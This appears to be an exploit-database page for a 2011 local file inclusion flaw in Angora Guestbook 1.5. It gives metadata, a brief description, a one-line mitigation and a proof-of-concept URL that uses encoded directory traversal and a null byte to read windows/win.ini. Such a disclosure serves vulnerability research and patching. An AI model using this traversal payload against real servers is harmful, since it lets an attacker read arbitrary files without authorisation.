header-logo
Suggest Exploit
vendor:
Angora Guestbook
by:
AutoSec Tools
9
CVSS
CRITICAL
Local File Inclusion
98
CWE
Product Name: Angora Guestbook
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011

Angora Guestbook 1.5 Local File Inclusion

A local file inclusion vulnerability in Angora Guestbook 1.5 can be exploited to include arbitrary files. The proof of concept is a URL that includes a path to the Windows win.ini file.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................Angora Guestbook 1.5
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://aguestbook.sourceforge.net/
Discovery Date..........6/1/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in Angora Guestbook 1.5 can be
exploited to include arbitrary files.


--PoC--

http://localhost/angora_1_5/guestbook/index.php?l=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg